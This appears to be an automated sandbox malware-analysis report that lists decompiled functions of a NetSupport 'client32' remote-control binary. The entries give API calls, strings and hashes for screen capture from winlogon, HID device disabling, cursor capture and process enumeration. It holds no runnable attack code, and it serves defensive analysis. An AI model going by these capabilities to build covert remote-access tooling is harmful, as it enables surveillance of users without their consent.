waveOutClose.WINMM(?,Audio,SleepBeforeClose,?,00000000,Audio,DisableReset,00000000,00000000), ref: 1100C02A
LeaveCriticalSection.KERNEL32(?,Audio,SleepBeforeClose,?,00000000,Audio,DisableReset,00000000,00000000), ref: 1100C037
SetEvent.KERNEL32(?), ref: 1100C04F
Sleep.KERNEL32(00000032), ref: 1100C062
_free.LIBCMT ref: 1100C0B3
LeaveCriticalSection.KERNEL32(?), ref: 1100C0D2

Part of subcall function 11110920: EnterCriticalSection.KERNEL32(00000010,00000000,74DF23A0,1100BF7B), ref: 11110928
Part of subcall function 11110920: LeaveCriticalSection.KERNEL32(00000010), ref: 11110935

Strings

Sleep(%d), xrefs: 1100BFE5
Audio, xrefs: 1100BF1B, 1100BFD4
SleepBeforeClose, xrefs: 1100BFCF
DisableReset, xrefs: 1100BF16

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CriticalSection$wave$EnterLeave$Close$CountResetSleepTick_free$EventLibrary$AddressExchangeFreeHandleHeaderInterlockedLoadProcStopUnprepare
String ID: Audio$DisableReset$Sleep(%d)$SleepBeforeClose
API String ID: 2353077881-253800072
Opcode ID: 0a6e07e8632aa8ac2311e51f5af2d924eec7d1df65065f13048220016fc9e1a5
Instruction ID: 4433b3cf7203cbf8351279b55151c8bcb30fc79a03092985150667f735e9d00b
Opcode Fuzzy Hash: 0a6e07e8632aa8ac2311e51f5af2d924eec7d1df65065f13048220016fc9e1a5
Instruction Fuzzy Hash: C3A1B274E00A5AABE715CFB4C984BAAFBE8BF09748F004669E529C3644D734A940CBD0

Function 110FFA00 Relevance: 52.7, APIs: 10, Strings: 20, Instructions: 233synchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D

Part of subcall function 110ED570: RegCreateKeyExA.ADVAPI32(00000000,0002001F,00000000,00000000,80000001,?,1105F29C,?,00000000,?,00000000,75BF8400,?,?,1105F29C,80000001), ref: 110ED59B

GetTickCount.KERNEL32 ref: 110FFB2D
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 110FFB3A
CloseHandle.KERNEL32(00000000), ref: 110FFB47
GetTickCount.KERNEL32 ref: 110FFB57
wsprintfA.USER32 ref: 110FFC2C
_memset.LIBCMT ref: 110FFC3D

Strings

JPK, xrefs: 110FFA22
TraceFile, xrefs: 110FFBA1
DisabledHID, xrefs: 110FFACD, 110FFCCE, 110FFCDA
Error %d opening key, xrefs: 110FFAA7
Waited %d ms for last devcon, xrefs: 110FFB63
Software\NetSupport Ltd\Client32, xrefs: 110FFA86
D, xrefs: 110FFC6F
nsdevcon.exe, xrefs: 110FFBCC, 110FFBD3, 110FFBF9
%s HID*, xrefs: 110FFC98
nsdevcon64.exe, xrefs: 110FFBC5, 110FFD28
Error creating process %s, xrefs: 110FFD29
Client, xrefs: 110FFA40
DisabledHIDCount, xrefs: 110FFABB
DisableHidDevices(%d), xrefs: 110FFA65
"%s" %s %s HID*, xrefs: 110FFC26
Waited, xrefs: 110FFD0F
_debug, xrefs: 110FFB7F, 110FFBA6
Waiting..., xrefs: 110FFCEA
DisableHIDCode, xrefs: 110FFA3B
Trace, xrefs: 110FFB7A

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CountTick$CloseCreateHandleObjectSingleWait__wcstoi64_memsetwsprintf
String ID: "%s" %s %s HID*$%s HID*$Client$D$DisableHIDCode$DisableHidDevices(%d)$DisabledHID$DisabledHIDCount$Error %d opening key$Error creating process %s$JPK$Software\NetSupport Ltd\Client32$Trace$TraceFile$Waited$Waited %d ms for last devcon$Waiting...$_debug$nsdevcon.exe$nsdevcon64.exe
API String ID: 137837830-3384686962
Opcode ID: b35417067d5139f6e34007a2760a1a54ecaaa1d8e595cef45fe73da4c1470625
Instruction ID: 1cfbd075dd3c16fb61dd79a416365c268fb302d04352701a8edc7847d9bdb0cc
Opcode Fuzzy Hash: b35417067d5139f6e34007a2760a1a54ecaaa1d8e595cef45fe73da4c1470625
Instruction Fuzzy Hash: B1814D7AE4432A6BE710DBA0DC59FEAF7B4EB04308F10459CE919676C0EB347940CB96

Function 110B3100 Relevance: 50.9, APIs: 23, Strings: 6, Instructions: 178filewindowCOMMON

Download Yara Rule

APIs

OpenEventA.KERNEL32(00100000,00000000,Client32DIBQuit), ref: 110B3130
OpenEventA.KERNEL32(00100000,00000000,Client32DIBBlit), ref: 110B3141
OpenEventA.KERNEL32(00000002,00000000,Client32DIBDone), ref: 110B314F
WaitForMultipleObjects.KERNEL32(00000002,00000000,00000000,000000FA), ref: 110B3183
OpenFileMappingA.KERNEL32(000F001F,00000000,Client32DIB), ref: 110B31A6
MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000), ref: 110B31C2
GetDC.USER32(00000000), ref: 110B31E8
CreateCompatibleDC.GDI32(00000000), ref: 110B31FC
CreateDIBSection.GDI32(00000000,00000004,00000000,?,?,?), ref: 110B321F
SelectObject.GDI32(00000000,00000000), ref: 110B3236
GetTickCount.KERNEL32 ref: 110B323F
BitBlt.GDI32(00000000,00000000,00000000,?,?,?,?,?,00CC0020), ref: 110B3276
GetTickCount.KERNEL32 ref: 110B327F
GetLastError.KERNEL32(00000000), ref: 110B328E
GdiFlush.GDI32 ref: 110B32A2
SelectObject.GDI32(00000000,?), ref: 110B32AD
DeleteObject.GDI32(00000000), ref: 110B32B4
SetEvent.KERNEL32(?), ref: 110B32BE
DeleteDC.GDI32(00000000), ref: 110B32C8
ReleaseDC.USER32(00000000,00000000), ref: 110B32D4
UnmapViewOfFile.KERNEL32(00000000), ref: 110B32DE
CloseHandle.KERNEL32(00000000), ref: 110B32E5
CloseHandle.KERNEL32(00000000), ref: 110B3309

Strings

Client32DIBQuit, xrefs: 110B3124
ERROR %d blitting from winlogon, took %d ms, xrefs: 110B3295
Client32DIBDone, xrefs: 110B3143
Client32DIBBlit, xrefs: 110B3132
Client32DIB, xrefs: 110B319A
ScrapeApp, xrefs: 110B3111

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: EventOpen$FileObject$CloseCountCreateDeleteHandleSelectTickView$CompatibleErrorFlushLastMappingMultipleObjectsReleaseSectionUnmapWait
String ID: Client32DIB$Client32DIBBlit$Client32DIBDone$Client32DIBQuit$ERROR %d blitting from winlogon, took %d ms$ScrapeApp
API String ID: 2071925733-2101319552
Opcode ID: 69ccdf57648ba78fab6be258752d8ad5ba147c4fba19d096890e8e9156bf9cf5
Instruction ID: 4116a02b123aa608432531ba698621a05075ff29bb652617cbc71955754d1d1a
Opcode Fuzzy Hash: 69ccdf57648ba78fab6be258752d8ad5ba147c4fba19d096890e8e9156bf9cf5
Instruction Fuzzy Hash: A9518679E40229ABDB14CFE4CD89F9EBBB4FB48704F104064F921AB644D774A900CB65

Function 11017D70 Relevance: 47.6, APIs: 26, Strings: 1, Instructions: 306windowCOMMON

Download Yara Rule

APIs

GetCursorInfo.USER32 ref: 11017DA1
GetIconInfo.USER32(?,?), ref: 11017DCB
GetObjectA.GDI32(?,00000018,?), ref: 11017DF9
DeleteObject.GDI32(?), ref: 11017E10
DeleteObject.GDI32(?), ref: 11017E1D
_memset.LIBCMT ref: 11017E40
DeleteObject.GDI32(?), ref: 11017ED0
DeleteObject.GDI32(?), ref: 11017EE1
GetBitmapBits.GDI32(?,?,?), ref: 11017F0C
GetObjectA.GDI32(?,00000018,?), ref: 11017F2A
_malloc.LIBCMT ref: 11017F77
GetBitmapBits.GDI32(?,?,00000000), ref: 11017F90
_free.LIBCMT ref: 1101808F
CreateCompatibleDC.GDI32(00000000), ref: 110180A7
CreateCompatibleDC.GDI32(00000000), ref: 110180AD
CreateBitmap.GDI32(?,?,00000001,00000001,00000000), ref: 110180C5
SelectObject.GDI32(00000000,00000000), ref: 110180D3
SelectObject.GDI32(00000000,?), ref: 110180E7
BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,00CC0020), ref: 11018110
SelectObject.GDI32(00000000,?), ref: 1101811E
SelectObject.GDI32(00000000,?), ref: 1101812C
GetBitmapBits.GDI32(?,?,?), ref: 1101815E
DeleteObject.GDI32(?), ref: 11018173
DeleteDC.GDI32(00000000), ref: 11018180
DeleteDC.GDI32(00000000), ref: 11018183
_memmove.LIBCMT ref: 110181A0

Strings

, xrefs: 11017F34

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Object$Delete$BitmapSelect$BitsCreate$CompatibleInfo$CursorIcon_free_malloc_memmove_memset
String ID:
API String ID: 3967744211-3916222277
Opcode ID: cbeff025b34ca9410ca74ee97cd60fe4e0102c054a27ae62cd463b60f668035f
Instruction ID: 3e508208b3a14101ae9c57e574a1132a2df501315089eda3cc6a8e84ca76c851
Opcode Fuzzy Hash: cbeff025b34ca9410ca74ee97cd60fe4e0102c054a27ae62cd463b60f668035f
Instruction Fuzzy Hash: A4C13071D40329DBEB25CB64CC88A9AB7B9FF48344F0041DAE519AB246D674EF85CF60

Function 11005410 Relevance: 44.0, APIs: 16, Strings: 9, Instructions: 214windowCOMMON

Download Yara Rule

APIs

Part of subcall function 1105E950: __itow.LIBCMT ref: 1105E975

GetObjectA.GDI32(?,0000003C,?), ref: 110054E5

Part of subcall function 11110230: _malloc.LIBCMT ref: 11110239
Part of subcall function 11110230: _memset.LIBCMT ref: 11110262

wsprintfA.USER32 ref: 1100553D
DeleteObject.GDI32(?), ref: 11005592
DeleteObject.GDI32(?), ref: 1100559B
SelectObject.GDI32(?,?), ref: 110055B2
DeleteObject.GDI32(?), ref: 110055B8
DeleteDC.GDI32(?), ref: 110055BE
SelectObject.GDI32(?,?), ref: 110055CF
DeleteObject.GDI32(?), ref: 110055D8
DeleteDC.GDI32(?), ref: 110055DE
DeleteObject.GDI32(?), ref: 110055EF
DeleteObject.GDI32(?), ref: 1100561A
DeleteObject.GDI32(?), ref: 11005638
DeleteObject.GDI32(?), ref: 11005641
ShowWindow.USER32(?,00000009), ref: 1100566F
PostQuitMessage.USER32(00000000), ref: 11005677

Strings

%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%s, xrefs: 11005537
PenStyle, xrefs: 1100546F
PenColour, xrefs: 11005451
FillColour, xrefs: 110054AB
Tool, xrefs: 11005433
Annotate, xrefs: 11005438, 11005456, 11005474, 11005492, 110054B0, 110054CE, 11005554
Font, xrefs: 1100554F
FillStyle, xrefs: 110054C9
PenWidth, xrefs: 1100548D

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Object$Delete$Select$MessagePostQuitShowWindow__itow_malloc_memsetwsprintf
String ID: %d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%s$Annotate$FillColour$FillStyle$Font$PenColour$PenStyle$PenWidth$Tool
API String ID: 2789700732-770455996
Opcode ID: 131ea691aa0fa706e41bd5a286a094aecf96abdf924dd2abea111bdf7eb7d0a0
Instruction ID: fd76b8300a222304a99732cac27ba94327f80de35dfbaf81c148901aa75ffadf
Opcode Fuzzy Hash: 131ea691aa0fa706e41bd5a286a094aecf96abdf924dd2abea111bdf7eb7d0a0
Instruction Fuzzy Hash: 24813775600609AFD368DBA5CD91EABF7F9BF8C704F00494DE5AAA7241CA74F801CB60

Function 11015840 Relevance: 43.7, APIs: 29, Instructions: 170COMMON

Download Yara Rule

APIs

BeginPaint.USER32(?,?), ref: 1101586F
GetWindowRect.USER32(?,?), ref: 11015887
_memset.LIBCMT ref: 11015895
CreateFontIndirectA.GDI32(?), ref: 110158B1
SelectObject.GDI32(00000000,00000000), ref: 110158C5
SetBkMode.GDI32(00000000,00000001), ref: 110158D0
BeginPath.GDI32(00000000), ref: 110158DD
TextOutA.GDI32(00000000,00000000,00000000), ref: 11015900
EndPath.GDI32(00000000), ref: 11015907
PathToRegion.GDI32(00000000), ref: 1101590E
CreateSolidBrush.GDI32(?), ref: 11015920
CreateSolidBrush.GDI32(?), ref: 11015936
CreatePen.GDI32(00000000,00000002,?), ref: 11015950
SelectObject.GDI32(00000000,00000000), ref: 1101595E
SelectObject.GDI32(00000000,?), ref: 1101596E
GetRgnBox.GDI32(00000000,?), ref: 1101597B
OffsetRgn.GDI32(00000000,?,00000000), ref: 1101599A
FillRgn.GDI32(00000000,00000000,?), ref: 110159A9
FrameRgn.GDI32(00000000,00000000,?,00000002,00000002), ref: 110159BC
DeleteObject.GDI32(00000000), ref: 110159C9
SelectObject.GDI32(00000000,?), ref: 110159D3
SelectObject.GDI32(00000000,?), ref: 110159DD
DeleteObject.GDI32(?), ref: 110159E6
DeleteObject.GDI32(?), ref: 110159EF
DeleteObject.GDI32(?), ref: 110159F8
SelectObject.GDI32(00000000,?), ref: 11015A02
DeleteObject.GDI32(?), ref: 11015A0B
SetBkMode.GDI32(00000000,?), ref: 11015A15
EndPaint.USER32(?,?), ref: 11015A29

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Object$Select$Delete$Create$Path$BeginBrushModePaintSolid$FillFontFrameIndirectOffsetRectRegionTextWindow_memset
String ID:
API String ID: 3702029449-0
Opcode ID: e7ca80d8907cc304a46d9070d682bdfbe178c52b0f9b8c57fa8b4971fc68b104
Instruction ID: e7a7d0d35206815f70b1bb972d69f7a8e5722a3a2875c7dff22017cd80ac6707
Opcode Fuzzy Hash: e7ca80d8907cc304a46d9070d682bdfbe178c52b0f9b8c57fa8b4971fc68b104
Instruction Fuzzy Hash: 6F51FA75A41228AFDB14DBA4CD88FAEB7B9FF89304F004199E51997244DB74AE40CF61

Function 11003800 Relevance: 40.7, APIs: 27, Instructions: 240COMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000004), ref: 1100385F
InflateRect.USER32(?,000000FF,000000FF), ref: 1100387A
GetSysColor.USER32(00000010), ref: 1100388D
GetSysColor.USER32(00000010), ref: 110038A4
GetSysColor.USER32(00000014), ref: 110038BB
GetSysColor.USER32(00000014), ref: 110038D2
GetSysColor.USER32(00000014), ref: 110038F5
GetSysColor.USER32(00000014), ref: 1100390C
GetSysColor.USER32(00000010), ref: 11003923
GetSysColor.USER32(00000010), ref: 1100393A
GetSysColor.USER32(00000004), ref: 11003951
SetBkColor.GDI32(00000000,00000000), ref: 11003958
InflateRect.USER32(?,000000FE,000000FD), ref: 11003966
GetSysColor.USER32(00000010), ref: 11003982
CreatePen.GDI32(?,00000001,00000000), ref: 1100398B
SelectObject.GDI32(00000000,00000000), ref: 11003999
MoveToEx.GDI32(00000000,?,?,00000000), ref: 110039B2
LineTo.GDI32(00000000,?,?), ref: 110039C6
SelectObject.GDI32(00000000,?), ref: 110039D4
DeleteObject.GDI32(?), ref: 110039DE
GetSysColor.USER32(00000014), ref: 110039EC
CreatePen.GDI32(?,00000001,00000000), ref: 110039F5
SelectObject.GDI32(00000000,00000000), ref: 11003A02
MoveToEx.GDI32(00000000,?,?,00000000), ref: 11003A1E
LineTo.GDI32(00000000,?,?), ref: 11003A35
SelectObject.GDI32(00000000,?), ref: 11003A43
DeleteObject.GDI32(00000000), ref: 11003A4A

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Color$Object$Select$CreateDeleteInflateLineMoveRect
String ID:
API String ID: 1903512896-0
Opcode ID: 2cfe13d901323041af8979d0bf4f233a4973ef12df7ab060298465a19fe5eca5
Instruction ID: aabe104b4c11b9f3e9ba86a19e2760383e051eecf234c5ca32d00541c09823f7
Opcode Fuzzy Hash: 2cfe13d901323041af8979d0bf4f233a4973ef12df7ab060298465a19fe5eca5
Instruction Fuzzy Hash: D18170B5900209AFEB14DFA4CC85EBFB7B9FF88704F104658F611A7681D770A941CBA0

Function 11107050 Relevance: 40.6, APIs: 16, Strings: 7, Instructions: 304libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(psapi.dll,B6DE5DE1,00000002,11030250,?,00000000,1118A896,000000FF,?,1110809F,00000000,?,11030250,00000000,00000000), ref: 1110708D

Part of subcall function 11138260: GetVersion.KERNEL32(00000000,74DF0BD0,00000000), ref: 11138283
Part of subcall function 11138260: GetModuleHandleA.KERNEL32(ntdll.dll), ref: 111382A4
Part of subcall function 11138260: GetProcAddress.KERNEL32(00000000,VerSetConditionMask), ref: 111382B4
Part of subcall function 11138260: GetModuleHandleA.KERNEL32(KERNEL32.DLL), ref: 111382D1
Part of subcall function 11138260: GetProcAddress.KERNEL32(00000000,VerifyVersionInfoA), ref: 111382DD
Part of subcall function 11138260: _memset.LIBCMT ref: 111382F7

FreeLibrary.KERNEL32(00000000,?,1110809F,00000000,?,11030250,00000000,00000000,?,?,?,?,?,00000000,MiniDumpType,000000FF), ref: 111070DF
LoadLibraryA.KERNEL32(Kernel32.dll,?,1110809F,00000000,?,11030250,00000000,00000000,?,?,?,?,?,00000000,MiniDumpType,000000FF), ref: 11107116
GetProcAddress.KERNEL32(00000000,WTSGetActiveConsoleSessionId), ref: 111071A0
GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 111071F1
GetProcAddress.KERNEL32(?,ProcessIdToSessionId), ref: 1110726A
SetLastError.KERNEL32(00000078,?,1110809F), ref: 1110728C
SetLastError.KERNEL32(00000078,?,1110809F), ref: 111072A3
SetLastError.KERNEL32(00000078,?,1110809F), ref: 111072B0
OpenProcess.KERNEL32(001F0FFF,00000000,?,?,1110809F), ref: 111072D0

Part of subcall function 110262F0: GetProcAddress.KERNEL32(00000000,GetProcessImageFileNameA), ref: 11026306
Part of subcall function 110262F0: GetProcAddress.KERNEL32(?,GetModuleFileNameExA), ref: 11026336

CloseHandle.KERNEL32(00000000,00000000,?,00000104,?,1110809F), ref: 11107446

Part of subcall function 11081E00: _strrchr.LIBCMT ref: 11081E0E

OpenProcessToken.ADVAPI32(00000000,00000008,?,?,00000000,?,00000104,?,1110809F), ref: 11107360
GetTokenInformation.ADVAPI32(?,0000000C(TokenIntegrityLevel),?,00000004,?,?,00000000,?,00000104,?,1110809F), ref: 1110738F
CloseHandle.KERNEL32(?,?,00000000,?,00000104,?,1110809F), ref: 1110743F
FreeLibrary.KERNEL32(?,?,?,?,?,1110809F), ref: 111074CC
FreeLibrary.KERNEL32(00000000,?,?,?,?,1110809F), ref: 111074D3

Strings

WTSGetActiveConsoleSessionId, xrefs: 11107184
Kernel32.dll, xrefs: 11107111
winlogon.exe, xrefs: 111073D4
ProcessIdToSessionId, xrefs: 11107264
psapi.dll, xrefs: 11107088
EnumProcesses, xrefs: 111071DF
dwm.exe, xrefs: 111073BB

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

